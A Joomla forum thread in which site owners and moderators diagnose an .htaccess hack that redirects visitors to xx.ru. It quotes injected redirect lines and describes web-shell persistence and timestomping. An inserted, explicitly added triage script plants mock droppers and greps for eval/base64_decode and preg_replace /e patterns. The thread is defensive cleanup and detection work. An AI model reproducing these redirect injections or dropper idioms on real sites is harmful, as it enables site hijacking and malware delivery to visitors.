htaccess hacked, re-directing traffic to xx.ru

Discussion regarding Joomla! 2.5 security issues.

PhilD
Joomla! Hero
Posts: 2737
Joined: Sat Oct 21, 2006 10:20 pm
Location: Wisconsin USA

Re: htaccess hacked, re-directing traffic to xx.ru

Post by PhilD » Sun Apr 01, 2012 7:50 pm

First, "dot" files are hidden files that are not accessible to normal web requests (viewing) on a properly configured server, just as a properly configured server won't list directory contents. On an improperly configured server that will expose the htaccess and directory contents, showing the htaccess file or listing directory contents is going to be the least of your worries.

To answer your question though, yes the added code (either version) does prevent viewing the file, just not when someone hacks your site.

Once access to a site/domain is gained by some means other than normal web access, then everything is accessible. It does not matter what is put into the htaccess to "prevent" viewing. This includes the htaccess file, any password protected directories, any configuration files, and anything else both inside of and outside of the public_html directory.

Put it like this: if I gain access then I can drop a 60k file on your site in some directory you're not likely to look in or replace in an update. I can then view and control all aspects of your domain while I sit at my computer; no usernames and no passwords are required. All I have to do is call my script from a browser and bingo, your entire domain is in front of me for me to do as I like.

Since it seems popular to add redirects to bad sites in your htaccess, then I'll put a hidden script somewhere on your site to do this and detect if the code I added is removed. If so then the script will put it back. If I'm smart I'll go slightly more sophisticated, automate my scripts to replicate, hide my script(s) better and add a backdoor so you can't find the script(s) by scanning for some @eval(gzinflate(base64_decode($code))); code. I'll also change the mtime of any files I add code to so the mtime is the same as what it originally was before I touched it.

On a misconfigured server or one with some exploit I can take advantage of, this same 60k script will allow me to both see and access every other domain account on the server as if it were a local drive on my computer and will in most cases also allow me to control the entire server. No root user or root password needed.


So unless you completely delete everything in the public_html directory and inspect closely whatever you're going to reuse, and update everything to the latest version to close the security hole, and follow the rest of the stuff on the checklists, I will be back. If for no other reason than to mess with you. BTW, remember that large image directory you did not take the time to inspect? It's only photos so no need to, right? Well, I put a file in there called rockymountain.php.jpg that allows me access to your site so I can hack your freshly cleaned and restored site.
PhilD

renegadeskone
Joomla! Fledgling
Posts: 4
Joined: Thu Feb 16, 2012 10:45 am

Re: htaccess hacked, re-directing traffic to xx.ru

Post by renegadeskone » Mon Apr 02, 2012 12:34 am

Thanks for all your replies. The issue is resolved for me, here's what I did:

- Upgraded all extensions to latest version
- Upgraded to latest Joomla
- Disabled eXtplorer (I don't even remember having it installed!)
- Blocked all admin accounts except for mine
- Changed my admin password
- Changed the FTP password
- Unpacked Joomla full version on to web server root, deleted installation folder
- Manually deleted all .htaccess files which were in the root and ALL 1st level folders
- Used Admin Tools to generate a new htaccess file, left all settings as default
- Updated passwords for relevant admin accounts to be reactivated

Seems to all be working good now. Thanks again for your replies. I have a huuuuuuge image directory on this site so there may still be malicious code lingering around. I'm going to download the whole site and sift through it manually to see if I can find anything else.

My host said that it's likely access was given to super admin account as there was an account with user of admin and password of password, which there definitely was not on the site previously. I'll be updating the database password too.

Cheers

big vern
Joomla! Apprentice
Posts: 6
Joined: Mon Nov 24, 2008 3:07 pm

Re: htaccess hacked, re-directing traffic to xx.ru

Post by big vern » Mon Apr 02, 2012 2:33 pm

Ok, this issue affected me. I tried everything but in the end the only thing that worked was biting the bullet and wiping the original Joomla install and installing the latest version (I know, I know, this is what we are told by mods and experts but you'll try anything to cut corners - thanks for the advice all).
Only posting this to save others some time if they think there is an easy shortcut.
Was also running phpBB on my site - luckily did not need to remove and restore that.

mandville
Joomla! Master
Posts: 15150
Joined: Mon Mar 20, 2006 1:56 am
Location: The Girly Side of Joomla in Sussex

Re: htaccess hacked, re-directing traffic to xx.ru

Post by mandville » Mon Apr 02, 2012 2:45 pm

big vern wrote:(I know, I know this is what we are told by mods and experts but you'll try anything to cut corners -
translates to http://docs.joomla.org/Top_10_Stupidest ... tor_Tricks
HU2HY- Poor questions = Poor answer
Un requested Help PM's will be reported, added to the foe list and possibly just deleted
{VEL Team Leader}{TM Auditor }{ Showcase & Security forums Moderator}

leolam
Joomla! Master
Posts: 20652
Joined: Mon Aug 29, 2005 10:17 am
Location: Netherlands/ Germany/ S'pore/Bogor/ North America

Re: htaccess hacked, re-directing traffic to xx.ru

Post by leolam » Mon Apr 02, 2012 3:03 pm

mandville wrote: translates to
ho,ho,ho,ho Mandville THAT is MEAN! (lot of high grade salt in open wounds) lol

Leo 8)
Joomla's #1 Professional Services Provider:
#Joomla Professional Support: https://gws-desk.com -
#Joomla Specialized Hosting Solutions: https://gws-host.com -

andysdp
Joomla! Apprentice
Posts: 6
Joined: Tue Feb 17, 2009 11:15 am

Site hacked .htaccess keeps changing

Post by andysdp » Mon Apr 02, 2012 6:57 pm

Hi Guys

I think my site has been hacked and I'm getting redirects to a Russian site and pages not loading as they should. The main .htaccess file keeps changing / reappearing after deleting it.

400 http://xx.ru/in.cgi?4
ErrorDocument 401 http://xx.ru/in.cgi?4
ErrorDocument 403 http://xx.ru/in.cgi?4
ErrorDocument 404 http://xx.ru/in.cgi?4
ErrorDocument 500 http://xx.ru/in.cgi?4
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteCond %{HTTP_REFERER} ^.*(google|ask|yahoo|baidu|[youtube]|wikipedia|qq|excite
</IfModule>

Any advice would be good. Have had a good search around on the forum and don't really know what to do next. Although had a Joomla site for many years, I've not had to deal with anything like this before!

Many thanks

Andy



Last PHP Error(s) Reported :: Forum Post Assistant (v1.2.0) : 2nd April 2012 wrote:[21-Mar-2012 00:06:04] PHP Warning: include_once() [function.include]: Failed opening '/home/stli2847/public_html/jupgrade/administrator/components/com_acymailing/helpers/helper.php' for inclusion (include_path='.:/usr/lib/php:/usr/local/lib/php:/home/stli2847/public_html/jupgrade/administrator/components/com_gcalendar/libraries') in /home/stli2847/public_html/jupgrade/modules/mod_acymailing/mod_acymailing.php on line 9
Forum Post Assistant (v1.2.0) : 2nd April 2012 wrote:
Basic Environment :: wrote:Joomla! Instance :: Joomla! 2.5.4-Stable (Ember) 2-April-2012
Joomla! Platform :: Joomla Platform 11.4.0-Stable (Brian Kernighan) 03-Jan-2012
Joomla! Configured :: Yes | Read-Only (444) | Owner: stli2847 (uid: 1013/gid: 1010) | Group: stli2847 (gid: 1010) | Valid For: 1.7 and above
Configuration Options :: Offline: 0 | SEF: 1 | SEF Suffix: 0 | SEF ReWrite: 0 | .htaccess/web.config: Yes | GZip: 0 | Cache: 1 | FTP Layer: 0 | SSL: 0 | Error Reporting: default | Site Debug: 0 | Language Debug: 0 | Default Access: 1 | Unicode Slugs: 0 | Database Credentials Present: Yes

Host Configuration :: OS: Linux | OS Version: 2.6.18-238.12.1.el5 | Technology: x86_64 | Web Server: Apache/2.2.19 (Unix) mod_ssl/2.2.19 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 | Encoding: gzip, deflate | Doc Root: /home/stli2847/public_html | System TMP Writable: Yes

PHP Configuration :: Version: 5.2.17 | PHP API: cgi | Session Path Writable: Yes | Display Errors: 1 | Error Reporting: 6135 | Log Errors To: error_log | Last Known Error: 21st March 2012 00:06:04. | Register Globals: | Magic Quotes: 1 | Safe Mode: | Open Base: | Uploads: 1 | Max. Upload Size: 8M | Max. POST Size: 8M | Max. Input Time: 60 | Max. Execution Time: 30 | Memory Limit: 128M

MySQL Configuration :: Version: 5.1.61-log (Client:5.1.61) | Host: --protected-- (--protected--) | Collation: latin1_swedish_ci (Character Set: latin1) | Database Size: 3.15 MiB | #of _FPA_TABLE: 187
Detailed Environment :: wrote:PHP Extensions :: date (5.2.17) | libxml () | openssl () | pcre () | zlib (1.1) | bcmath () | calendar () | ctype () | curl () | dom (20031129) | filter (0.11.0) | ftp () | gd () | gettext () | hash (1.0) | iconv () | session () | json (1.2.1) | mbstring () | mcrypt () | mysql (1.0) | SimpleXML (0.1) | posix () | Reflection (0.1) | standard (5.2.17) | SPL (0.2) | mysqli (0.1) | soap () | sockets () | imap () | tokenizer (0.1) | xml () | xmlreader (0.1) | xmlwriter (0.1) | xsl (0.1) | cgi () | eAccelerator (0.9.6.1) | suhosin (0.9.32.1) | PDO (1.0.4dev) | pdo_sqlite (1.0.1) | SQLite (2.0-dev) | pdo_mysql (1.0.2) | ionCube Loader () | Zend Optimizer () | Zend Engine (2.2.0) |
Potential Missing Extensions :: zip |

Switch User Environment (Experimental) :: PHP CGI: Yes | Server SU: Yes | PHP SU: Yes | Custom SU (Cloud/Grid): No
Potential Ownership Issues: Maybe
Folder Permissions :: wrote:Core Folders :: images/ (755) | components/ (755) | modules/ (755) | plugins/ (755) | language/ (755) | templates/ (755) | cache/ (755) | logs/ (755) | tmp/ (755) | administrator/components/ (755) | administrator/modules/ (755) | administrator/language/ (755) | administrator/templates/ (755) |
Templates Discovered :: wrote:Templates :: SITE :: siteground-j15-18 (1.0.0) | my_japurity (1.2.0) | beez_20 (2.5.0) | SiteGround-j16-7 (1.0.0) | siteground-j15-23 (1.0.0) | ProPages-FJT (1.7.0) | beez5 (2.5.0) | siteground-j16-5 (1.0.0) | 123wd-j15-2 (1.0.0) | atomic (2.5.0) | JA_Purity_ii (2.5.0) | bayolax (1.7.0) | JA_Purity (1.2.0) | rhuk_milkyway (1.0.2) |
Templates :: ADMIN :: bluestork (2.5.0) | hathor (2.5.0) |
Last edited by mandville on Mon Apr 02, 2012 7:18 pm, edited 1 time in total.
Reason: trimmed code, removed link

Webdongle
Joomla! Master
Posts: 44021
Joined: Sat Apr 05, 2008 9:58 pm

Re: Site hacked .htaccess keeps changing

Post by Webdongle » Mon Apr 02, 2012 7:08 pm

Can you run the FPA with the extensions showing ?
Have you checked your computer ?
http://www.weblinksonline.co.uk/
https://www.weblinksonline.co.uk/updating-joomla.html
"When I'm right no one remembers but when I'm wrong no one forgets".

andysdp
Joomla! Apprentice
Posts: 6
Joined: Tue Feb 17, 2009 11:15 am

Re: htaccess hacked, re-directing traffic to xx.ru

Post by andysdp » Tue Apr 03, 2012 1:37 am

Thanks for the reply: the computer has been checked for viruses and malware.
Forum Post Assistant (v1.2.0) : 3rd April 2012 wrote:

Elevated Permissions (First 10) :: None

yaanimai
Joomla! Explorer
Posts: 359
Joined: Thu Jun 14, 2007 2:48 pm
Location: Coppell, Texas

Re: htaccess hacked, re-directing traffic to xx.ru

Post by yaanimai » Tue Apr 03, 2012 4:05 am

I have one Joomla 1.5.25 site that got this same hack to the .htaccess file. There were also .htaccess files with the malicious code in every Joomla sub directory: modules, plugins, administrator, images, templates, etc.

I have lots of Joomla sites on another host that have not been hacked, but I have one client that hosts his own site on a GoDaddy account.

I deleted every single folder & file on the hosting account & restored from a "History" version that GoDaddy keeps. This version did not have the malicious .htaccess files in it.

I upgraded to Joomla 1.5.26 but within a few minutes the root directory & all the Joomla sub directories had the hacked .htaccess files in them again (not sure if they got generated before I did the 1.5.26 upgrade.)

I deleted them again & so far they have not come back.

If they come back again I will post here.

I am wondering if they came from another account on the same server?

yaanimai
Joomla! Explorer
Posts: 359
Joined: Thu Jun 14, 2007 2:48 pm
Location: Coppell, Texas

Re: htaccess hacked, re-directing traffic to xx.ru

Post by yaanimai » Tue Apr 03, 2012 4:42 am

The malicious code is back in the .htaccess file!

Not sure what is generating the code or where it is coming from.

The core joomla sub directories also have new .htaccess files in them, so far they are empty but I know some code is about to appear in them soon.

Not sure what to do about this now.

mandville
Joomla! Master
Posts: 15150
Joined: Mon Mar 20, 2006 1:56 am
Location: The Girly Side of Joomla in Sussex

Re: htaccess hacked, re-directing traffic to xx.ru

Post by mandville » Tue Apr 03, 2012 8:35 am

If people run the cron commands here http://docs.joomla.org/Security_Checkli ... d_and_cron then that may help time stamp the insertion of the code so that your logs/host can track it down.
Note: on some busy sites a large email will be produced.
HU2HY- Poor questions = Poor answer
Un requested Help PM's will be reported, added to the foe list and possibly just deleted
{VEL Team Leader}{TM Auditor }{ Showcase & Security forums Moderator}

jimbrooking
Joomla! Enthusiast
Posts: 104
Joined: Thu Mar 17, 2011 12:38 am

Site Hacked - 404 errors hijacked

Post by jimbrooking » Tue Apr 03, 2012 10:43 am

My site (http://www.fearringtonfha .org) was compromised on or about March 30. On Sunday, April 1 I found that all the .htaccess files on my Joomla 2.5 site (upgraded from 1.7 on March 18) had been modified to send traffic to a Russian malware site in case of any page error (401, 402, 403, 404, 500). I repaired all the .htaccess files. However 404 errors were still being redirected to the same Russian site.

This morning I changed my .htaccess file to handle 404 errors with a page within my Joomla site. This appears to work as expected, and 404 errors now go correctly to the page I specify in the .htaccess file.

Apparently some code within Joomla handles 404 errors (i.e., prior to my latest change to .htaccess), and apparently this code has somehow been compromised. Can anyone give me an idea of where to look for the bad code?

Thanks.
Last edited by mandville on Tue Apr 03, 2012 11:39 am, edited 2 times in total.
Reason: Moved the topic from the forum Administration to Security

yaanimai
Joomla! Explorer
Posts: 359
Joined: Thu Jun 14, 2007 2:48 pm
Location: Coppell, Texas

Re: htaccess hacked, re-directing traffic to xx.ru

Post by yaanimai » Tue Apr 03, 2012 1:43 pm

I think I have my site fixed.

After replacing the compromised .htaccess file in the root & deleting the .htaccess files in all the Joomla core sub directories, the .htaccess files were being regenerated. There is code inserted into the beginning of the core .htaccess that is in the root directory & also a little way below the bottom of the same .htaccess file.

After looking in the files carefully, and following some hints found in these forums & other posts on the internet, I found a file called "_cache_iccizijj.php" in the tmp sub directory. It has comments at the beginning of the file about vBulletin 3.1.9 including the vBulletin copyright notice. It has a lot of very long strings of code that look like random key strokes but I suspect this file is generating the .htaccess files.

I renamed the _cache_iccizijj.php file & deleted the malicious code in the root .htaccess file & deleted all the other .htaccess files in the Joomla core sub directories and my site has been trouble free now for several hours.

My site was Joomla 1.5.25; I upgraded it to 1.5.26. I changed the Super Admin & Admin user passwords.

It appears to be fixed now. I can type in an incorrect site url & I get the correct 404 page. I will post back here if the problem reoccurs. I am about to delete the renamed _cache_iccizijj.php file.

Webdongle
Joomla! Master
Posts: 44021
Joined: Sat Apr 05, 2008 9:58 pm

Re: htaccess hacked, re-directing traffic to xx.ru

Post by Webdongle » Tue Apr 03, 2012 3:59 pm

As previously stated many times by several people, deleting a few files is no good. The only way to be certain to be rid of all the infected files is to delete every folder/file on the server.

Giving advice to the contrary is ill advised.
http://www.weblinksonline.co.uk/
https://www.weblinksonline.co.uk/updating-joomla.html
"When I'm right no one remembers but when I'm wrong no one forgets".

andysdp
Joomla! Apprentice
Posts: 6
Joined: Tue Feb 17, 2009 11:15 am

Re: htaccess hacked, re-directing traffic to xx.ru

Post by andysdp » Tue Apr 03, 2012 4:05 pm

yaanimai - thanks for your post! I think I have fixed my site also. I too found a file similar to the one you mentioned in the tmp sub directory - mine called _cache_ldxmbzqi.php. Again it had vBulletin references and a load of what looks like encrypted code. I was happy to delete it as I have no vBulletin installs. After deleting this file and cleaning up three .htaccess files my site has been back to normal for a couple of hours and without new code injected into the .htaccess files. Will monitor and report back.

Just need to know how it got there in the first place......

Cheers

Andy

andysdp
Joomla! Apprentice
Posts: 6
Joined: Tue Feb 17, 2009 11:15 am

Re: htaccess hacked, re-directing traffic to xx.ru

Post by andysdp » Tue Apr 03, 2012 4:26 pm

Interestingly, from my logs there has been someone from IP address 188.190.127.71 trying to access the above file. Somewhere in Ukraine, a host called Infium.

Someone send the boys round.....

Webdongle
Joomla! Master
Posts: 44021
Joined: Sat Apr 05, 2008 9:58 pm

Re: htaccess hacked, re-directing traffic to xx.ru

Post by Webdongle » Tue Apr 03, 2012 4:48 pm

andysdp wrote:.... I think I have fixed my site also. I too found a similar file you mentioned in the tmp sub directory - mine called _cache_ldxmbzqi.php. ...
And we all know what thought did :laugh:

Unless you delete all the folders/files on the server then you are still infected. It is not just the .htaccess that is being infected with the redirect code. Images and legitimate files are also being infected.

Once access is gained to your server then various files are loaded onto your server.

What is your url ?
http://www.weblinksonline.co.uk/
https://www.weblinksonline.co.uk/updating-joomla.html
"When I'm right no one remembers but when I'm wrong no one forgets".

andysdp
Joomla! Apprentice
Posts: 6
Joined: Tue Feb 17, 2009 11:15 am

Re: htaccess hacked, re-directing traffic to xx.ru

Post by andysdp » Tue Apr 03, 2012 5:13 pm

http://www.1stlinslade. org.uk this is the older 1.5.23 site which is live to our members. The updated 2.5.4 site is sitting in http://www.1stlinslade. org.uk/jupgrade until I have completed all my changes.

Webdongle - I bow to your greater knowledge and will take on board any further advice. In simple terms, what do you suggest I do next? Wiping and starting again sounds like an unenviable task! Especially after spending time adjusting the JA-Purity template which was core in 1.5 and now not core in 2.5! As I have said earlier I have been running Joomla for many years, and this is a hobby done in spare time for my Scout Group - I'm not a programmer! Is there any easy to follow guide for deleting folders/files while keeping all content intact - has the database been infected? How can I assess the extent of infection?

Many thanks for your help

Andy
Last edited by mandville on Tue Apr 03, 2012 5:36 pm, edited 1 time in total.
Reason: broke link

Webdongle
Joomla! Master
Posts: 44021
Joined: Sat Apr 05, 2008 9:58 pm

Re: htaccess hacked, re-directing traffic to xx.ru

Post by Webdongle » Tue Apr 03, 2012 5:53 pm

@andysdp
Told you so, scanned a few minutes ago
Capture 143.PNG
Now will you please stop saying it's fixed by deleting just a few files? That sort of comment only allows others to falsely think their sites are safe by doing the same.

Again I say
As previously stated many times by several people, deleting a few files is no good. The only way to be certain to be rid of all the infected files is to delete every folder/file on the server.

Giving advice to the contrary is ill advised.
http://www.weblinksonline.co.uk/
https://www.weblinksonline.co.uk/updating-joomla.html
"When I'm right no one remembers but when I'm wrong no one forgets".

andysdp
Joomla! Apprentice
Posts: 6
Joined: Tue Feb 17, 2009 11:15 am

Re: htaccess hacked, re-directing traffic to xx.ru

Post by andysdp » Wed Apr 04, 2012 1:51 am

@webdongle
Thanks for your reply. I missed a couple of .htaccess files! Thanks for info on the scanning site - just re-scanned both my 1.5.23 and 2.5.4 sites and it is reporting clear now, which is a relief - see screenshots.
Thanks Andy
Screenshot.png
Screenshot2.png

kurchania
Joomla! Hero
Posts: 2070
Joined: Mon Sep 21, 2009 6:56 am
Location: indore,india
Contact:

Re: htaccess hacked, re-directing traffic to xx.ru

Post by kurchania » Wed Apr 04, 2012 5:08 am

@andysdp
The site is hacked using the wso2.5 web shell script, which replaces all the .htaccess files of the root folder. This script can give access to all files.
If you are affected, please review the .htaccess of the subdomain and the folders which contain a .htaccess.
Please review the tmp folder; you can find the cache_ file there, with preg_replace again.
Remember the date on which this script was uploaded to the server.
If this is shared hosting, please consult your hosting provider, because one domain can affect all the subdomains. Meaning, a file present in any other domain on shared hosting can access your code also.
Also, better search the log file for when this file was inserted on the server. Ask your hosting provider to restore the backup from before this date and then update everything.

Regards
Abhijeet
abhijeet kurchania
The future depends on what you do today

Webdongle
Joomla! Master
Posts: 44021
Joined: Sat Apr 05, 2008 9:58 pm

Re: htaccess hacked, re-directing traffic to xx.ru

Post by Webdongle » Wed Apr 04, 2012 10:03 am

andysdp wrote:I missed a couple of .htaccess files! Thanks for info on the scanning site -...
Or those files got infected after you looked at them before.

andysdp wrote:... just re-scanned both my 1.5.23 and 2.5.4 sites and it is reporting clear now,
Did the 1.5.23 site not throw out a warning of old software? That site is likely to be infected again!

Have you checked all the extensions are up to date and not on the VEL?

Have you checked all computers with admin/FTP access, and with how many anti-malware/antivirus programs?

To be sure, perhaps run the Forum Post Assistant on both sites and post the results here?
http://www.weblinksonline.co.uk/
https://www.weblinksonline.co.uk/updating-joomla.html
"When I'm right no one remembers but when I'm wrong no one forgets".

mandville
Joomla! Master
Posts: 15150
Joined: Mon Mar 20, 2006 1:56 am
Location: The Girly Side of Joomla in Sussex

Re: htaccess hacked, re-directing traffic to xx.ru

Post by mandville » Wed Apr 04, 2012 11:03 am

kurchania - thanks for showing up so late at the party; sorry you haven't had time to read the topic or the post you are answering, which clearly says his site is now fixed.

Your attempt to be helpful by retelling the canteen gossip is unfortunately badly placed.
kurchania wrote:@andysdp
the site is hacked using wso2.5
It is known by many names, some listed in this topic.
if you are affected please review the htaccess folder of the subdomain and folder which contain htaccess.
As listed in http://forum.joomla.org/viewtopic.php?f=621&t=582854 and quoted many times in this topic, along with the rest of the info you provided.
As we have mentioned before to "certain" people, please read the full topic, then post considerately and helpfully, and don't confuse.

Summary of this topic so far.
* affects all hosts and server configurations
* is not joomla specific (vb/wp/drup/html sites all report issues)

procedure to repair
see the forum sticky Before you post : read and action this

concentrate on http://docs.joomla.org/Security_Checklist_7 with specific attention to http://docs.joomla.org/Security_Checkli ... ter_relief
and http://docs.joomla.org/Security_Checkli ... d_and_cron

Suggestion: create a .htaccess file in the tmp folder with the code from http://docs.joomla.org/Security_Checkli ... ermissions to attempt to hamper attacks.
HU2HY- Poor questions = Poor answer
Un requested Help PM's will be reported, added to the foe list and possibly just deleted
{VEL Team Leader}{TM Auditor }{ Showcase & Security forums Moderator}

kurchania
Joomla! Hero
Posts: 2070
Joined: Mon Sep 21, 2009 6:56 am
Location: indore,india
Contact:

Re: htaccess hacked, re-directing traffic to xx.ru

Post by kurchania » Wed Apr 04, 2012 11:59 am

@mandville,
I cleaned the files on the 19th of last month, and 2 days ago the site was infected with a big red screen, so I posted.
I apologise if this looks like canteen gossip, that some shell script is running freely on shared server hosting which has the privilege to affect all the domains/permissions/database/Brutal attack.
abhijeet kurchania
The future depends on what you do today

Webdongle
Joomla! Master
Posts: 44021
Joined: Sat Apr 05, 2008 9:58 pm

Re: htaccess hacked, re-directing traffic to xx.ru

Post by Webdongle » Wed Apr 04, 2012 12:27 pm

kurchania wrote:...
I cleaned the files on 19 last month and 2 days ago the site is infected with big red screen.so I post....
Looks like you have holes in your security that let them in. Or you never deleted all your files.

Please use the Forum Post Assistant and post the results here. Also the site in the form of www.site dot com
http://www.weblinksonline.co.uk/
https://www.weblinksonline.co.uk/updating-joomla.html
"When I'm right no one remembers but when I'm wrong no one forgets".

leolam
Joomla! Master
Posts: 20652
Joined: Mon Aug 29, 2005 10:17 am
Location: Netherlands/ Germany/ S'pore/Bogor/ North America
Contact:

Re: htaccess hacked, re-directing traffic to xx.ru

Post by leolam » Mon Apr 09, 2012 2:36 am

An easy-to-read article on the .htaccess hacks can be found here: http://www.squidoo.com/htaccess-hacked
It relies on either a website with poor protection or the use of the FTP password. They normally obtain this from a Trojan virus on your system.
Leo 8)
Joomla's #1 Professional Services Provider:
#Joomla Professional Support: https://gws-desk.com -
#Joomla Specialized Hosting Solutions: https://gws-host.com -

denisw
Joomla! Fledgling
Posts: 4
Joined: Sun Mar 11, 2012 7:27 pm

Re: htaccess hacked, re-directing traffic to xx.ru

Post by denisw » Wed Apr 11, 2012 9:42 pm

- It seems to me it could be an automated attack, given the wide range of hosts affected in a very similar way, so if anyone has any details they will probably apply to others as well;
- The vulnerability used (previously unknown) was:
http://www.nonumber.nl/news/releases/28 ... extensions

denisw
Joomla! Fledgling
Posts: 4
Joined: Sun Mar 11, 2012 7:27 pm

Re: htaccess hacked, re-directing traffic to xx.ru

Post by denisw » Thu Apr 12, 2012 8:22 pm

Some more info about the GoDaddy issues (all files removed, yet 404 Not Found still redirects to the attacker's site):

Apparently there is something above the 'root directory'. It isn't accessible from FTP or the FTP/file manager, but it is still there. The attack put a .htaccess in there, and the Apache ErrorDocument directives in it applied.

To check that, I used the following PHP code placed into the root:

Code:

<?php
// Executed by the web server, so it reads one level above the
// FTP-visible root, where the planted .htaccess sits.
readfile('../.htaccess');

and to remove it:

Code:

<?php
// Delete the planted file; unlink() returns false if it is not there.
unlink('../.htaccess');

PhilD
Joomla! Hero
Posts: 2737
Joined: Sat Oct 21, 2006 10:20 pm
Location: Wisconsin USA
Contact:

Re: htaccess hacked, re-directing traffic to xx.ru

Post by PhilD » Thu Apr 12, 2012 10:37 pm

I have said that several times in several posts here. The hack PLACES A COPY of the hacked .htaccess file, with the redirects in it, above the publicly accessible directories. This file needs to be found and removed, as .htaccess files do not belong outside of a publicly accessible area. The hacking put it there, and they can access this file by way of the additional files placed within the publicly accessible areas of your site. When I mention publicly accessible areas, I mean where the normal site (Joomla) files are installed. This is usually public_html, but some hosts call this area www, htdocs, or something similar.
PhilD
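The triage kurchania describes (look for every .htaccess, check tmp/ for cache_ files carrying preg_replace, note when files changed) and the point denisw and PhilD make about a planted .htaccess sitting above the web root can be run as one script. This is an added example, not code from this thread, from Joomla or from any host's tooling; the directory layout, file names, dates and the attacker.invalid domain are all constructed so it runs offline, and the regexes are triage heuristics, not a malware signature.

```shell
#!/bin/sh
# Added triage example; not code from this thread or from Joomla. It builds a
# constructed shared-hosting tree (paths and contents are made up) and runs
# three checks: find every .htaccess including any above public_html, flag
# off-site redirects, and grep PHP files for two common obfuscation idioms.
set -eu

make_sample_tree() {
    root=$(mktemp -d)
    mkdir -p "$root/public_html/tmp" "$root/public_html/images"

    # Legitimate Joomla-style .htaccess: its rewrite stays on-site.
    printf 'RewriteEngine On\nRewriteRule .* index.php [L]\n' > "$root/public_html/.htaccess"
    printf '<?php echo "ok"; ?>\n' > "$root/public_html/index.php"
    # Backdate the clean files so they look like an old install.
    touch -t 201201010000 "$root/public_html/.htaccess" "$root/public_html/index.php"

    # Reference point: the admin's last known-clean date (constructed).
    touch -t 201203190000 "$root/last_known_clean"

    # Planted copy ABOVE the web root: often unreachable over FTP, yet Apache
    # still applies it to every request under the account.
    printf 'ErrorDocument 404 http://attacker.invalid/go\nRewriteRule ^(.*)$ http://attacker.invalid/$1 [R=301,L]\n' \
        > "$root/.htaccess"

    # Dropper in tmp/ named like Joomla cache debris, left with today's mtime.
    printf '<?php @eval(gzinflate(base64_decode($code))); ?>\n' > "$root/public_html/tmp/cache_3f9a.php"

    # Second dropper whose mtime was reset to blend in with the old files:
    # the date check below misses it, the content check does not.
    printf '<?php preg_replace("/.*/e", $payload, ""); ?>\n' > "$root/public_html/images/index.php"
    touch -t 201201010000 "$root/public_html/images/index.php"

    echo "$root"
}

# 1. Every .htaccess from the account root down, not just inside public_html.
find_htaccess() {
    find "$1" -type f -name .htaccess | sort
}

# A stock Joomla .htaccess has no absolute-URL targets, so any Redirect,
# RewriteRule or ErrorDocument pointing at http(s):// sends visitors off-site.
htaccess_redirects_offsite() {
    grep -Eiq '^[[:space:]]*(Redirect(Match|Permanent)?|RewriteRule|ErrorDocument)[[:space:]].*https?://' "$1"
}

count_offsite_htaccess() {
    find_htaccess "$1" | while IFS= read -r f; do
        htaccess_redirects_offsite "$f" && echo "$f"
    done | wc -l | tr -d ' '
}

# 2. Files modified after the last known-clean date. A hint only: mtime is
# attacker-controlled, as the timestomped dropper shows.
count_newer_than() {
    find "$1" -type f -newer "$2" | wc -l | tr -d ' '
}

# 3. Content-based: eval(...base64_decode...) and preg_replace with the /e
# modifier, which evaluated the replacement as PHP before PHP 7.
find_suspect_php() {
    pat="eval[[:space:]]*\(.*base64_decode|preg_replace[[:space:]]*\(.*/[a-z]*e[a-z]*['\"]"
    find "$1" -type f -name '*.php' -exec grep -lE "$pat" {} + | sort
}

count_suspect_php() {
    find_suspect_php "$1" | wc -l | tr -d ' '
}

# Stand-alone run over the constructed tree.
site=$(make_sample_tree)
echo "== .htaccess files =="; find_htaccess "$site"
echo "== off-site redirecting: $(count_offsite_htaccess "$site") =="
echo "== files newer than last_known_clean: $(count_newer_than "$site" "$site/last_known_clean") =="
echo "== PHP with obfuscation idioms =="; find_suspect_php "$site"
rm -rf "$site"
```

On a real account, point the functions at the directory above public_html (or the highest level a shell or a PHP file can reach), not at the web root, since the planted copy described above lives outside it. Treat the mtime check as a tie-breaker only: the backdated dropper in the sample is found by content, not by date.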

Webdongle
Joomla! Master
Posts: 44021
Joined: Sat Apr 05, 2008 9:58 pm

Re: htaccess hacked, re-directing traffic to xx.ru

Post by Webdongle » Thu Apr 12, 2012 11:43 pm

Hi PhilD

With shared hosting (as I'm sure you know) there are different ways the FTP folders are organised.
  1. On some packages, FTP access is to the folder above public_html.
    Are you saying a .htaccess is being placed above that directory?
  2. Some shared hosting has the FTP inside public_html. Are you saying the .htaccess file is being placed in the folder above public_html even though FTP access is not allowed above it?
Interesting to note that when configuring Akeeba, the folders can often be navigated 1 or 2 levels above the highest used in FTP (in some cases it is possible to view all the domain names that are shared). Although Akeeba does warn "This directory is outside your site's root. Its contents may be unreadable." when entering a different site tree, it does not when going higher than the FTP reaches. So if Akeeba can access it, it's not surprising other things can.
http://www.weblinksonline.co.uk/
https://www.weblinksonline.co.uk/updating-joomla.html
"When I'm right no one remembers but when I'm wrong no one forgets".
